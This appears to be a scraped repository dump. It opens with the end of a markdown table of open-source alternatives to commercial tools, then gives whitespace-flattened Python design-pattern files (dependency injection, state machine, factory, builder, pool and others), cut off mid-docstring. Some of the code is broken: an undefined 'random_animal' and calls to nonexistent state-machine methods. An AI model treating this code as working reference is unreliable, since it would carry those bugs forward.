href=https://github.com/gitroomhq/postiz-app><img src="https://img.shields.io/github/stars/gitroomhq/postiz-app?style=social" width=150/></a>|[Buffer](https://buffer.com/), [Hootsuite](https://hootsuite.com/) Streaming|[Glimesh](https://glimesh.tv/)|Live streaming platform|<a href=https://github.com/glimesh/glimesh.tv><img src="https://img.shields.io/github/stars/glimesh/glimesh.tv?style=social" width=150/></a>|[Twitch](https://www.twitch.tv/) Timeseries database|[CrateDB](https://crate.io/)|Distributed SQL database for real-time analytics of time series data|<a href="https://github.com/crate/crate"><img 
src="https://img.shields.io/github/stars/crate/crate?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[InfluxDB](https://www.influxdata.com/)|Database designed to process time series data|<a href=https://github.com/influxdata/influxdb><img src="https://img.shields.io/github/stars/influxdata/influxdb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[QuestDB](https://questdb.io/)|Database designed to process time series data|<a href=https://github.com/questdb/questdb><img src="https://img.shields.io/github/stars/questdb/questdb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[TDengine](https://tdengine.com/?en)|Database designed to process time series data|<a href=https://github.com/taosdata/TDengine><img src="https://img.shields.io/github/stars/taosdata/TDengine?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Timeseries database|[TimescaleDB](https://www.timescale.com/)|Database designed to process time series data|<a href=https://github.com/timescale/timescaledb><img src="https://img.shields.io/github/stars/timescale/timescaledb?style=social" width=150/></a>|[Kdb+](https://kx.com/developers/) Tunnelling|[Tunnelmole](https://tunnelmole.com/)|Get a Public URL for your local development environment|<a href=https://github.com/robbie-cahill/tunnelmole-client><img src="https://img.shields.io/github/stars/robbie-cahill/tunnelmole-client?style=social" width=150/></a>|[Ngrok](https://ngrok.com) VPN as a Service|[OmniEdge](https://omniedge.io/)|No-code P2P layer-2 mesh VPN for enterprise with zero config |<a href=https://github.com/omniedgeio/omniedge><img src="https://img.shields.io/github/stars/omniedgeio/omniedge?style=social" width=150/></a>|[OpenVPN](https://openvpn.net), [Ngrok](https://ngrok.com), [Oray](https://www.oray.com), [AWS VPC](https://aws.amazon.com/vpc/)| Video Conferencing|[Jitsi](https://jitsi.org/meet)|Video conferencing platform and SDK|<a href=https://github.com/jitsi/jitsi-meet><img src="https://img.shields.io/github/stars/jitsi/jitsi-meet?style=social" width=150/></a>|[Zoom](https://zoom.us/)| Video Conferencing|[LiveKit](https://livekit.io/)|SFU and SDKs for high-performance, scalable WebRTC|<a href=https://github.com/livekit/livekit-server><img src="https://img.shields.io/github/stars/livekit/livekit-server?style=social" width=150/></a>|[Twilio](https://www.twilio.com/), [Agora](https://agora.io/)| Video Conferencing|[OpenVidu](https://openvidu.io/)|Platform and SDKs to build on-premises WebRTC video conferences|<a href=https://github.com/OpenVidu/openvidu><img src="https://img.shields.io/github/stars/OpenVidu/openvidu?style=social" width=150/></a>|[Twilio](https://www.twilio.com/)| Webhooks|[Svix](https://www.svix.com/)|Webhooks as a Service|<a href=https://github.com/svix/svix-webhooks><img src="https://img.shields.io/github/stars/Svix/svix-webhooks?style=social" width=150/></a>|[Pusher](https://pusher.com/)| Website analytics|[GoatCounter](https://www.goatcounter.com/)|Google Analytics alternative|<a href=https://github.com/arp242/goatcounter><img src="https://img.shields.io/github/stars/arp242/goatcounter?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/) Website analytics|[Matomo](https://matomo.org/)|Google Analytics alternative|<a href=https://github.com/matomo-org/matomo><img src="https://img.shields.io/github/stars/matomo-org/matomo?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/)
Website analytics|[Plausible](https://plausible.io/)|Google Analytics alternative|<a href=https://github.com/plausible/analytics><img src="https://img.shields.io/github/stars/plausible/analytics?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/)
Website analytics|[Swetrix](https://swetrix.com)|Google Analytics alternative|<a href=https://github.com/swetrix/swetrix-js><img src="https://img.shields.io/github/stars/swetrix/swetrix-js?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/)|
Website analytics|[Umami](https://umami.is)|Google Analytics alternative|<a href=https://github.com/mikecao/umami><img src="https://img.shields.io/github/stars/mikecao/umami?style=social" width=150/></a>|[Google Analytics](https://analytics.google.com/)
Workflow automation|[Activepieces](https://www.activepieces.com)|No-code business automation tool|<a href=https://github.com/activepieces/activepieces><img src="https://img.shields.io/github/stars/activepieces/activepieces?style=social" width=150/></a>|[Zapier](https://www.zapier.com/), [Tray](https://tray.io/)
Workflow automation|[N8N](https://n8n.io/)|Node-based workflow automation tool for developers|<a href=https://github.com/n8n-io/n8n><img src="https://img.shields.io/github/stars/n8n-io/n8n?style=social" width=150/></a>|[Zapier](https://zapier.com/)
Workflow automation|[Pipedream](https://pipedream.com/)|Workflow automation and API integration platform|<a href=https://github.com/PipedreamHQ/pipedream><img src="https://img.shields.io/github/stars/PipedreamHQ/pipedream?style=social" width=150/></a>|[Zapier](https://zapier.com/), [Integromat](https://www.integromat.com/)|
Workflow automation|[Temporal](https://temporal.io/)|Workflows as code platform|<a href=https://github.com/temporalio/temporal><img src="https://img.shields.io/github/stars/temporalio/temporal?style=social" width=150/></a>|[Zapier](https://zapier.com/)

<!-- END STARTUP LIST -->

## Useful Links

- Great [article](https://rajko-rad.medium.com/the-rise-of-open-source-challengers-4a3d93932425) on open-source challengers by Rajko Radovanovic
python-patterns
328b2d469e92d6a0dfe17d37d3b180412723db45
File: setup.py from setuptools import find_packages, setup setup( name="patterns", packages=find_packages(), description="A collection of design patterns and idioms in Python.", classifiers=[ "Programming Language :: Python :: 2", "Programming Language :: Python :: 2.7", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", ], ) File: patterns/dependency_injection.py """ Dependency Injection (DI) is a technique whereby one object supplies the dependencies (services) to another object (client). It allows to decouple objects: no need to change client code simply because an object it depends on needs to be changed to a different one. (Open/Closed principle) Port of the Java example of Dependency Injection" in "xUnit Test Patterns - Refactoring Test Code" by Gerard Meszaros (ISBN-10: 0131495054, ISBN-13: 978-0131495050) In the following example `time_provider` (service) is embedded into TimeDisplay (client). If such service performed an expensive operation you would like to substitute or mock it in tests. class TimeDisplay(object): def __init__(self): self.time_provider = datetime.datetime.now def get_current_time_as_html_fragment(self): current_time = self.time_provider() current_time_as_html_fragment = "<span class=\"tinyBoldText\">{}</span>".format(current_time) return current_time_as_html_fragment """ import datetime from typing import Callable class ConstructorInjection: def __init__(self, time_provider: Callable) -> None: self.time_provider = time_provider def get_current_time_as_html_fragment(self) -> str: current_time = self.time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment class ParameterInjection: def __init__(self) -> None: pass def get_current_time_as_html_fragment(self, time_provider: Callable) -> str: current_time = time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment class SetterInjection: """Setter Injection""" def __init__(self): pass def set_time_provider(self, time_provider: Callable): self.time_provider = time_provider def get_current_time_as_html_fragment(self): current_time = self.time_provider() current_time_as_html_fragment = '<span class="tinyBoldText">{}</span>'.format( current_time ) return current_time_as_html_fragment def production_code_time_provider() -> str: """ Production code version of the time provider (just a wrapper for formatting datetime for this example). 
""" current_time = datetime.datetime.now() current_time_formatted = f"{current_time.hour}:{current_time.minute}" return current_time_formatted def midnight_time_provider() -> str: """Hard-coded stub""" return "24:01" def main(): """ >>> time_with_ci1 = ConstructorInjection(midnight_time_provider) >>> time_with_ci1.get_current_time_as_html_fragment() '<span class="tinyBoldText">24:01</span>' >>> time_with_ci2 = ConstructorInjection(production_code_time_provider) >>> time_with_ci2.get_current_time_as_html_fragment() '<span class="tinyBoldText">...</span>' >>> time_with_pi = ParameterInjection() >>> time_with_pi.get_current_time_as_html_fragment(midnight_time_provider) '<span class="tinyBoldText">24:01</span>' >>> time_with_si = SetterInjection() >>> time_with_si.get_current_time_as_html_fragment() Traceback (most recent call last): ... AttributeError: 'SetterInjection' object has no attribute 'time_provider' >>> time_with_si.set_time_provider(midnight_time_provider) >>> time_with_si.get_current_time_as_html_fragment() '<span class="tinyBoldText">24:01</span>' """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/__init__.py File: patterns/other/blackboard.py """ @author: Eugene Duboviy <[email protected]> | github.com/duboviy In Blackboard pattern several specialised sub-systems (knowledge sources) assemble their knowledge to build a possibly partial or approximate solution. In this way, the sub-systems work together to solve the problem, where the solution is the sum of its parts. https://en.wikipedia.org/wiki/Blackboard_system """ from __future__ import annotations import abc import random class Blackboard: def __init__(self) -> None: self.experts = [] self.common_state = { "problems": 0, "suggestions": 0, "contributions": [], "progress": 0, # percentage, if 100 -> task is finished } def add_expert(self, expert: AbstractExpert) -> None: self.experts.append(expert) class Controller: def __init__(self, blackboard: Blackboard) -> None: self.blackboard = blackboard def run_loop(self): """ This function is a loop that runs until the progress reaches 100. It checks if an expert is eager to contribute and then calls its contribute method. 
""" while self.blackboard.common_state["progress"] < 100: for expert in self.blackboard.experts: if expert.is_eager_to_contribute: expert.contribute() return self.blackboard.common_state["contributions"] class AbstractExpert(metaclass=abc.ABCMeta): def __init__(self, blackboard: Blackboard) -> None: self.blackboard = blackboard @property @abc.abstractmethod def is_eager_to_contribute(self): raise NotImplementedError("Must provide implementation in subclass.") @abc.abstractmethod def contribute(self): raise NotImplementedError("Must provide implementation in subclass.") class Student(AbstractExpert): @property def is_eager_to_contribute(self) -> bool: return True def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(1, 10) self.blackboard.common_state["suggestions"] += random.randint(1, 10) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(1, 2) class Scientist(AbstractExpert): @property def is_eager_to_contribute(self) -> int: return random.randint(0, 1) def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(10, 20) self.blackboard.common_state["suggestions"] += random.randint(10, 20) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(10, 30) class Professor(AbstractExpert): @property def is_eager_to_contribute(self) -> bool: return True if self.blackboard.common_state["problems"] > 100 else False def contribute(self) -> None: self.blackboard.common_state["problems"] += random.randint(1, 2) self.blackboard.common_state["suggestions"] += random.randint(10, 20) self.blackboard.common_state["contributions"] += [self.__class__.__name__] self.blackboard.common_state["progress"] += random.randint(10, 100) def main(): """ >>> blackboard = Blackboard() >>> blackboard.add_expert(Student(blackboard)) >>> blackboard.add_expert(Scientist(blackboard)) >>> blackboard.add_expert(Professor(blackboard)) >>> c = Controller(blackboard) >>> contributions = c.run_loop() >>> from pprint import pprint >>> pprint(contributions) ['Student', 'Student', 'Student', 'Student', 'Scientist', 'Student', 'Student', 'Student', 'Scientist', 'Student', 'Scientist', 'Student', 'Student', 'Scientist', 'Professor'] """ if __name__ == "__main__": random.seed(1234) # for deterministic doctest outputs import doctest doctest.testmod() File: patterns/other/__init__.py File: patterns/other/graph_search.py class GraphSearch: """Graph search emulation in python, from source http://www.python.org/doc/essays/graphs/ dfs stands for Depth First Search bfs stands for Breadth First Search""" def __init__(self, graph): self.graph = graph def find_path_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return path for node in self.graph.get(start, []): if node not in path: newpath = self.find_path_dfs(node, end, path[:]) if newpath: return newpath def find_all_paths_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return [path] paths = [] for node in self.graph.get(start, []): if node not in path: newpaths = self.find_all_paths_dfs(node, end, path[:]) paths.extend(newpaths) return paths def find_shortest_path_dfs(self, start, end, path=None): path = path or [] path.append(start) if start == end: return path shortest = None for node in self.graph.get(start, []): if node not in path: newpath = self.find_shortest_path_dfs(node, end, 
path[:]) if newpath: if not shortest or len(newpath) < len(shortest): shortest = newpath return shortest def find_shortest_path_bfs(self, start, end): """ Finds the shortest path between two nodes in a graph using breadth-first search. :param start: The node to start from. :type start: str or int :param end: The node to find the shortest path to. :type end: str or int :returns queue_path_to_end, dist_to[end]: A list of nodes representing the shortest path from `start` to `end`, and a dictionary mapping each node in the graph (except for `start`) with its distance from it (in terms of hops). If no such path exists, returns an empty list and an empty dictionary instead. """ queue = [start] dist_to = {start: 0} edge_to = {} if start == end: return queue while len(queue): value = queue.pop(0) for node in self.graph[value]: if node not in dist_to.keys(): edge_to[node] = value dist_to[node] = dist_to[value] + 1 queue.append(node) if end in edge_to.keys(): path = [] node = end while dist_to[node] != 0: path.insert(0, node) node = edge_to[node] path.insert(0, start) return path def main(): """ # example of graph usage >>> graph = { ... 'A': ['B', 'C'], ... 'B': ['C', 'D'], ... 'C': ['D', 'G'], ... 'D': ['C'], ... 'E': ['F'], ... 'F': ['C'], ... 'G': ['E'], ... 'H': ['C'] ... } # initialization of new graph search object >>> graph_search = GraphSearch(graph) >>> print(graph_search.find_path_dfs('A', 'D')) ['A', 'B', 'C', 'D'] # start the search somewhere in the middle >>> print(graph_search.find_path_dfs('G', 'F')) ['G', 'E', 'F'] # unreachable node >>> print(graph_search.find_path_dfs('C', 'H')) None # non existing node >>> print(graph_search.find_path_dfs('C', 'X')) None >>> print(graph_search.find_all_paths_dfs('A', 'D')) [['A', 'B', 'C', 'D'], ['A', 'B', 'D'], ['A', 'C', 'D']] >>> print(graph_search.find_shortest_path_dfs('A', 'D')) ['A', 'B', 'D'] >>> print(graph_search.find_shortest_path_dfs('A', 'F')) ['A', 'C', 'G', 'E', 'F'] >>> print(graph_search.find_shortest_path_bfs('A', 'D')) ['A', 'B', 'D'] >>> print(graph_search.find_shortest_path_bfs('A', 'F')) ['A', 'C', 'G', 'E', 'F'] # start the search somewhere in the middle >>> print(graph_search.find_shortest_path_bfs('G', 'F')) ['G', 'E', 'F'] # unreachable node >>> print(graph_search.find_shortest_path_bfs('A', 'H')) None # non existing node >>> print(graph_search.find_shortest_path_bfs('A', 'X')) None """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/other/hsm/hsm.py """ Implementation of the HSM (hierarchical state machine) or NFSM (nested finite state machine) C++ example from http://www.eventhelix.com/RealtimeMantra/HierarchicalStateMachine.htm#.VwqLVEL950w in Python - single source 'message type' for state transition changes - message type considered, messages (comment) not considered to avoid complexity """ class UnsupportedMessageType(BaseException): pass class UnsupportedState(BaseException): pass class UnsupportedTransition(BaseException): pass class HierachicalStateMachine: def __init__(self): self._active_state = Active(self) # Unit.Inservice.Active() self._standby_state = Standby(self) # Unit.Inservice.Standby() self._suspect_state = Suspect(self) # Unit.OutOfService.Suspect() self._failed_state = Failed(self) # Unit.OutOfService.Failed() self._current_state = self._standby_state self.states = { "active": self._active_state, "standby": self._standby_state, "suspect": self._suspect_state, "failed": self._failed_state, } self.message_types = { "fault trigger": self._current_state.on_fault_trigger, 
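            # NOTE: these handlers are bound to whatever state is current at
            # construction time (the standby state assigned just above); the
            # table is built once here and is not rebuilt on state changes.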
"switchover": self._current_state.on_switchover, "diagnostics passed": self._current_state.on_diagnostics_passed, "diagnostics failed": self._current_state.on_diagnostics_failed, "operator inservice": self._current_state.on_operator_inservice, } def _next_state(self, state): try: self._current_state = self.states[state] except KeyError: raise UnsupportedState def _send_diagnostics_request(self): return "send diagnostic request" def _raise_alarm(self): return "raise alarm" def _clear_alarm(self): return "clear alarm" def _perform_switchover(self): return "perform switchover" def _send_switchover_response(self): return "send switchover response" def _send_operator_inservice_response(self): return "send operator inservice response" def _send_diagnostics_failure_report(self): return "send diagnostics failure report" def _send_diagnostics_pass_report(self): return "send diagnostics pass report" def _abort_diagnostics(self): return "abort diagnostics" def _check_mate_status(self): return "check mate status" def on_message(self, message_type): # message ignored if message_type in self.message_types.keys(): self.message_types[message_type]() else: raise UnsupportedMessageType class Unit: def __init__(self, HierachicalStateMachine): self.hsm = HierachicalStateMachine def on_switchover(self): raise UnsupportedTransition def on_fault_trigger(self): raise UnsupportedTransition def on_diagnostics_failed(self): raise UnsupportedTransition def on_diagnostics_passed(self): raise UnsupportedTransition def on_operator_inservice(self): raise UnsupportedTransition class Inservice(Unit): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_fault_trigger(self): self._hsm._next_state("suspect") self._hsm._send_diagnostics_request() self._hsm._raise_alarm() def on_switchover(self): self._hsm._perform_switchover() self._hsm._check_mate_status() self._hsm._send_switchover_response() class Active(Inservice): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_fault_trigger(self): super().perform_switchover() super().on_fault_trigger() def on_switchover(self): self._hsm.on_switchover() # message ignored self._hsm.next_state("standby") class Standby(Inservice): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_switchover(self): super().on_switchover() # message ignored self._hsm._next_state("active") class OutOfService(Unit): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_operator_inservice(self): self._hsm.on_switchover() # message ignored self._hsm.send_operator_inservice_response() self._hsm.next_state("suspect") class Suspect(OutOfService): def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine def on_diagnostics_failed(self): super().send_diagnostics_failure_report() super().next_state("failed") def on_diagnostics_passed(self): super().send_diagnostics_pass_report() super().clear_alarm() # loss of redundancy alarm super().next_state("standby") def on_operator_inservice(self): super().abort_diagnostics() super().on_operator_inservice() # message ignored class Failed(OutOfService): """No need to override any method.""" def __init__(self, HierachicalStateMachine): self._hsm = HierachicalStateMachine File: patterns/other/hsm/__init__.py File: patterns/creational/abstract_factory.py """ *What is this pattern about? 
In Java and other languages, the Abstract Factory Pattern serves to provide an interface for creating related/dependent objects without need to specify their actual class. The idea is to abstract the creation of objects depending on business logic, platform choice, etc. In Python, the interface we use is simply a callable, which is "builtin" interface in Python, and in normal circumstances we can simply use the class itself as that callable, because classes are first class objects in Python. *What does this example do? This particular implementation abstracts the creation of a pet and does so depending on the factory we chose (Dog or Cat, or random_animal) This works because both Dog/Cat and random_animal respect a common interface (callable for creation and .speak()). Now my application can create pets abstractly and decide later, based on my own criteria, dogs over cats. *Where is the pattern used practically? *References: https://sourcemaking.com/design_patterns/abstract_factory http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Provides a way to encapsulate a group of individual factories. """ import random from typing import Type class Pet: def __init__(self, name: str) -> None: self.name = name def speak(self) -> None: raise NotImplementedError def __str__(self) -> str: raise NotImplementedError class Dog(Pet): def speak(self) -> None: print("woof") def __str__(self) -> str: return f"Dog<{self.name}>" class Cat(Pet): def speak(self) -> None: print("meow") def __str__(self) -> str: return f"Cat<{self.name}>" class PetShop: """A pet shop""" def __init__(self, animal_factory: Type[Pet]) -> None: """pet_factory is our abstract factory. We can set it at will.""" self.pet_factory = animal_factory def buy_pet(self, name: str) -> Pet: """Creates and shows a pet using the abstract factory""" pet = self.pet_factory(name) print(f"Here is your lovely {pet}") return pet # Show pets with various factories def main() -> None: """ # A Shop that sells only cats >>> cat_shop = PetShop(Cat) >>> pet = cat_shop.buy_pet("Lucy") Here is your lovely Cat<Lucy> >>> pet.speak() meow """ if __name__ == "__main__": shop = PetShop(random_animal) import doctest doctest.testmod() File: patterns/creational/__init__.py File: patterns/creational/factory.py """*What is this pattern about? A Factory is an object for creating other objects. *What does this example do? The code shows a way to localize words in two languages: English and Greek. "get_localizer" is the factory function that constructs a localizer depending on the language chosen. The localizer object will be an instance from a different class according to the language localized. However, the main code does not have to worry about which localizer will be instantiated, since the method "localize" will be called in the same way independently of the language. *Where can the pattern be used practically? The Factory Method can be seen in the popular web framework Django: https://docs.djangoproject.com/en/4.0/topics/forms/formsets/ For example, different types of forms are created using a formset_factory *References: http://ginstrom.com/scribbles/2007/10/08/design-patterns-python-style/ *TL;DR Creates objects without having to specify the exact class. 
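
A new language can be supported by writing another class with the same
``localize(msg)`` method and adding it to the ``localizers`` mapping inside
``get_localizer``; a rough sketch (``SpanishLocalizer`` is a hypothetical
name, not part of this module)::

    class SpanishLocalizer:
        def localize(self, msg: str) -> str:
            return {"dog": "perro", "cat": "gato"}.get(msg, msg)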
""" from typing import Dict, Protocol, Type class Localizer(Protocol): def localize(self, msg: str) -> str: pass class GreekLocalizer: """A simple localizer a la gettext""" def __init__(self) -> None: self.translations = {"dog": "σκύλος", "cat": "γάτα"} def localize(self, msg: str) -> str: """We'll punt if we don't have a translation""" return self.translations.get(msg, msg) class EnglishLocalizer: """Simply echoes the message""" def localize(self, msg: str) -> str: return msg def get_localizer(language: str = "English") -> Localizer: """Factory""" localizers: Dict[str, Type[Localizer]] = { "English": EnglishLocalizer, "Greek": GreekLocalizer, } return localizers[language]() def main(): """ # Create our localizers >>> e, g = get_localizer(language="English"), get_localizer(language="Greek") # Localize some text >>> for msg in "dog parrot cat bear".split(): ... print(e.localize(msg), g.localize(msg)) dog σκύλος parrot parrot cat γάτα bear bear """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/builder.py """ *What is this pattern about? It decouples the creation of a complex object and its representation, so that the same process can be reused to build objects from the same family. This is useful when you must separate the specification of an object from its actual representation (generally for abstraction). *What does this example do? The first example achieves this by using an abstract base class for a building, where the initializer (__init__ method) specifies the steps needed, and the concrete subclasses implement these steps. In other programming languages, a more complex arrangement is sometimes necessary. In particular, you cannot have polymorphic behaviour in a constructor in C++ - see https://stackoverflow.com/questions/1453131/how-can-i-get-polymorphic-behavior-in-a-c-constructor - which means this Python technique will not work. The polymorphism required has to be provided by an external, already constructed instance of a different class. In general, in Python this won't be necessary, but a second example showing this kind of arrangement is also included. *Where is the pattern used practically? *References: https://sourcemaking.com/design_patterns/builder *TL;DR Decouples the creation of a complex object and its representation. """ # Abstract Building class Building: def __init__(self) -> None: self.build_floor() self.build_size() def build_floor(self): raise NotImplementedError def build_size(self): raise NotImplementedError def __repr__(self) -> str: return "Floor: {0.floor} | Size: {0.size}".format(self) # Concrete Buildings class House(Building): def build_floor(self) -> None: self.floor = "One" def build_size(self) -> None: self.size = "Big" class Flat(Building): def build_floor(self) -> None: self.floor = "More than One" def build_size(self) -> None: self.size = "Small" # In some very complex cases, it might be desirable to pull out the building # logic into another function (or a method on another class), rather than being # in the base class '__init__'. 
(This leaves you in the strange situation where # a concrete class does not have a useful constructor) class ComplexBuilding: def __repr__(self) -> str: return "Floor: {0.floor} | Size: {0.size}".format(self) class ComplexHouse(ComplexBuilding): def build_floor(self) -> None: self.floor = "One" def build_size(self) -> None: self.size = "Big and fancy" def construct_building(cls) -> Building: building = cls() building.build_floor() building.build_size() return building def main(): """ >>> house = House() >>> house Floor: One | Size: Big >>> flat = Flat() >>> flat Floor: More than One | Size: Small # Using an external constructor function: >>> complex_house = construct_building(ComplexHouse) >>> complex_house Floor: One | Size: Big and fancy """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/lazy_evaluation.py """ Lazily-evaluated property pattern in Python. https://en.wikipedia.org/wiki/Lazy_evaluation *References: bottle https://github.com/bottlepy/bottle/blob/cafc15419cbb4a6cb748e6ecdccf92893bb25ce5/bottle.py#L270 django https://github.com/django/django/blob/ffd18732f3ee9e6f0374aff9ccf350d85187fac2/django/utils/functional.py#L19 pip https://github.com/pypa/pip/blob/cb75cca785629e15efb46c35903827b3eae13481/pip/utils/__init__.py#L821 pyramid https://github.com/Pylons/pyramid/blob/7909e9503cdfc6f6e84d2c7ace1d3c03ca1d8b73/pyramid/decorator.py#L4 werkzeug https://github.com/pallets/werkzeug/blob/5a2bf35441006d832ab1ed5a31963cbc366c99ac/werkzeug/utils.py#L35 *TL;DR Delays the eval of an expr until its value is needed and avoids repeated evals. """ import functools class lazy_property: def __init__(self, function): self.function = function functools.update_wrapper(self, function) def __get__(self, obj, type_): if obj is None: return self val = self.function(obj) obj.__dict__[self.function.__name__] = val return val def lazy_property2(fn): """ A lazy property decorator. The function decorated is called the first time to retrieve the result and then that calculated result is used the next time you access the value. """ attr = "_lazy__" + fn.__name__ @property def _lazy_property(self): if not hasattr(self, attr): setattr(self, attr, fn(self)) return getattr(self, attr) return _lazy_property class Person: def __init__(self, name, occupation): self.name = name self.occupation = occupation self.call_count2 = 0 @lazy_property def relatives(self): # Get all relatives, let's assume that it costs much time. relatives = "Many relatives." return relatives @lazy_property2 def parents(self): self.call_count2 += 1 return "Father and mother" def main(): """ >>> Jhon = Person('Jhon', 'Coder') >>> Jhon.name 'Jhon' >>> Jhon.occupation 'Coder' # Before we access `relatives` >>> sorted(Jhon.__dict__.items()) [('call_count2', 0), ('name', 'Jhon'), ('occupation', 'Coder')] >>> Jhon.relatives 'Many relatives.' # After we've accessed `relatives` >>> sorted(Jhon.__dict__.items()) [('call_count2', 0), ..., ('relatives', 'Many relatives.')] >>> Jhon.parents 'Father and mother' >>> sorted(Jhon.__dict__.items()) [('_lazy__parents', 'Father and mother'), ('call_count2', 1), ..., ('relatives', 'Many relatives.')] >>> Jhon.parents 'Father and mother' >>> Jhon.call_count2 1 """ if __name__ == "__main__": import doctest doctest.testmod(optionflags=doctest.ELLIPSIS) File: patterns/creational/prototype.py """ *What is this pattern about? This patterns aims to reduce the number of classes required by an application. 
Instead of relying on subclasses it creates objects by copying a prototypical instance at run-time. This is useful as it makes it easier to derive new kinds of objects, when instances of the class have only a few different combinations of state, and when instantiation is expensive. *What does this example do? When the number of prototypes in an application can vary, it can be useful to keep a Dispatcher (aka, Registry or Manager). This allows clients to query the Dispatcher for a prototype before cloning a new instance. Below provides an example of such Dispatcher, which contains three copies of the prototype: 'default', 'objecta' and 'objectb'. *TL;DR Creates new object instances by cloning prototype. """ from __future__ import annotations from typing import Any class Prototype: def __init__(self, value: str = "default", **attrs: Any) -> None: self.value = value self.__dict__.update(attrs) def clone(self, **attrs: Any) -> Prototype: """Clone a prototype and update inner attributes dictionary""" # Python in Practice, Mark Summerfield # copy.deepcopy can be used instead of next line. obj = self.__class__(**self.__dict__) obj.__dict__.update(attrs) return obj class PrototypeDispatcher: def __init__(self): self._objects = {} def get_objects(self) -> dict[str, Prototype]: """Get all objects""" return self._objects def register_object(self, name: str, obj: Prototype) -> None: """Register an object""" self._objects[name] = obj def unregister_object(self, name: str) -> None: """Unregister an object""" del self._objects[name] def main() -> None: """ >>> dispatcher = PrototypeDispatcher() >>> prototype = Prototype() >>> d = prototype.clone() >>> a = prototype.clone(value='a-value', category='a') >>> b = a.clone(value='b-value', is_checked=True) >>> dispatcher.register_object('objecta', a) >>> dispatcher.register_object('objectb', b) >>> dispatcher.register_object('default', d) >>> [{n: p.value} for n, p in dispatcher.get_objects().items()] [{'objecta': 'a-value'}, {'objectb': 'b-value'}, {'default': 'default'}] >>> print(b.category, b.is_checked) a True """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/pool.py """ *What is this pattern about? This pattern is used when creating an object is costly (and they are created frequently) but only a few are used at a time. With a Pool we can manage those instances we have as of now by caching them. Now it is possible to skip the costly creation of an object if one is available in the pool. A pool allows to 'check out' an inactive object and then to return it. If none are available the pool creates one to provide without wait. *What does this example do? In this example queue.Queue is used to create the pool (wrapped in a custom ObjectPool object to use with the with statement), and it is populated with strings. As we can see, the first string object put in "yam" is USED by the with statement. But because it is released back into the pool afterwards it is reused by the explicit call to sample_queue.get(). Same thing happens with "sam", when the ObjectPool created inside the function is deleted (by the GC) and the object is returned. *Where is the pattern used practically? *References: http://stackoverflow.com/questions/1514120/python-implementation-of-the-object-pool-design-pattern https://sourcemaking.com/design_patterns/object_pool *TL;DR Stores a set of initialized objects kept ready to use. 
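
The essential check-out / return cycle, in rough form (``sample_queue`` is
any pre-populated ``queue.Queue``, as in the doctest below)::

    with ObjectPool(sample_queue) as item:
        ...                      # the item is checked out of the queue here
    # on exit, __exit__ puts the item back into the queue for reuse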
""" class ObjectPool: def __init__(self, queue, auto_get=False): self._queue = queue self.item = self._queue.get() if auto_get else None def __enter__(self): if self.item is None: self.item = self._queue.get() return self.item def __exit__(self, Type, value, traceback): if self.item is not None: self._queue.put(self.item) self.item = None def __del__(self): if self.item is not None: self._queue.put(self.item) self.item = None def main(): """ >>> import queue >>> def test_object(queue): ... pool = ObjectPool(queue, True) ... print('Inside func: {}'.format(pool.item)) >>> sample_queue = queue.Queue() >>> sample_queue.put('yam') >>> with ObjectPool(sample_queue) as obj: ... print('Inside with: {}'.format(obj)) Inside with: yam >>> print('Outside with: {}'.format(sample_queue.get())) Outside with: yam >>> sample_queue.put('sam') >>> test_object(sample_queue) Inside func: sam >>> print('Outside func: {}'.format(sample_queue.get())) Outside func: sam if not sample_queue.empty(): print(sample_queue.get()) """ if __name__ == "__main__": import doctest doctest.testmod() File: patterns/creational/borg.py """ *What is this pattern about? The Borg pattern (also known as the Monostate pattern) is a way to implement singleton behavior, but instead of having only one instance of a class, there are multiple instances that share the same state. In other words, the focus is on sharing state instead of sharing instance identity. *What does this example do? To understand the implementation of this pattern in Python, it is important to know that, in Python, instance attributes are stored in a attribute dictionary called __dict__. Usually, each instance will have its own dictionary, but the Borg pattern modifies this so that all instances have the same dictionary. In this example, the __shared_state attribute will be the dictionary shared between all instances, and this is ensured by assigning __shared_state to the __dict__ variable when initializing a new instance (i.e., in the __init__ method). Other attributes are usually added to the instance's attribute dictionary, but, since the attribute dictionary itself is shared (which is __shared_state), all other attributes will also be shared. *Where is the pattern used practically? Sharing state is useful in applications like managing database connections: https://github.com/onetwopunch/pythonDbTemplate/blob/master/database.py *References: - https://fkromer.github.io/python-pattern-references/design/#singleton - https://learning.oreilly.com/library/view/python-cookbook/0596001673/ch05s23.html - http://www.aleax.it/5ep.html *TL;DR Provides singleton-like behavior sharing state between instances. 
